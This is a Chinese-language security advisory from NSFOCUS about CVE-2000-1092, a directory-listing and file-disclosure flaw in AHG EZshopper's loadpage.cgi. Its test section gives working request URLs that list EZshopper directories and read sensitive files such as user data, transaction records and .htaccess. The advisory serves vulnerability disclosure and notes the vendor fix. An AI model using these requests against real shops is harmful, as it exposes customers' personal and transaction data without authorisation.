AHG EZshopper loadpage.cgi目录列表泄露漏洞

发布日期：2000-12-13

CVE ID：CVE-2000-1092

受影响的软件及系统：
====================
Alex Heiphetz Group EZshopper v.3.0 for Unix
Alex Heiphetz Group EZshopper v.2.0 for Unix

综述：
======
NSFOCUS安全小组发现AHG公司的EZshopper所带的loadpage.cgi存在一个安全漏洞。攻击者可以获得EZshopper目录的文件列表及其敏感文件内容。

分析：
======
EZshopper是AHG(www.ahg.com)公司开发的一套网上商店系统。它包含一些Perl脚本。其中有一个CGI程序：loadpage.cgi，它用来打开并显示EZshopper目录下的HTML文件。

通常的调用格式如下：

EZshopper v3.0：
http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=<文件名>
EZshopper v2.0：
http://site/cgi-bin/ezshopper2/loadpage.cgi?+<文件名>

然而，loadpage.cgi没有正确检查用户输入的"文件名"是否真是一个文件。如果输入的"文件名"是目录名，loadpage.cgi将会返回当前EZshopper目录下的文件列表。攻击者可以根据返回信息进入子目录或者查看敏感文件（例如，用户数据文件，交易信息文件，.htaccess等等）的内容。

注意：这个漏洞不能用来查看EZshopper之外的目录，因为新版本的loadpage.cgi检查了文件名是否包含"../".

测试方法：
==========
提交下列URL可以看到EZshopper根目录下的文件列表（如果页面显示为空，查看浏览器中当前页面的源码）。

EZshopper v3.0：
http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/

EZshopper v2.0：
http://site/cgi-bin/ezshopper2/loadpage.cgi?id+/

如果想要查看EZshopper子目录的文件列表，可以提交下列URL:

EZshopper v3.0：
http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/subdirectory/

EZshopper v2.0：
http://site/cgi-bin/ezshopper2/loadpage.cgi?id+/subdirectory/

在得到文件列表后，攻击者就可以使用下面类似的URL来查看任意文件内容。
http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=/<目录名>/<文件名>
http://site/cgi-bin/ezshopper2/loadpage.cgi?+/<目录名>/<文件名>

厂商状态：
==========
我们于2000年12月4日将此问题通知厂商。AHG已经修复了此漏洞。正在使用有问题版本的用户请尽快升级到最新版本。

厂商主页：
http://www.ahg.com/

声 明
==========

本安全公告仅用来描述可能存在的安全问题，绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告，必须保证此安全公告的完整性，包括版权声明等全部内容。未经绿盟科技允许，不得任意修改或者增减此安全公告内容，不得以任何方式将其用于商业目的。

关于绿盟科技
============

绿盟科技（NSFOCUS Co., Ltd.）是中国网络安全领域的领导企业，致力于网络和系统安全问题的研究、高端网络安全产品的研发、销售与网络安全服务，在入侵检测/保护、远程评估、 DDoS攻击防护等方面提供具有国际竞争能力的先进产品，是国内最具安全服务经验的专业公司。有关绿盟科技的详情请参见： http://www.nsfocus.com

© 2024 绿盟科技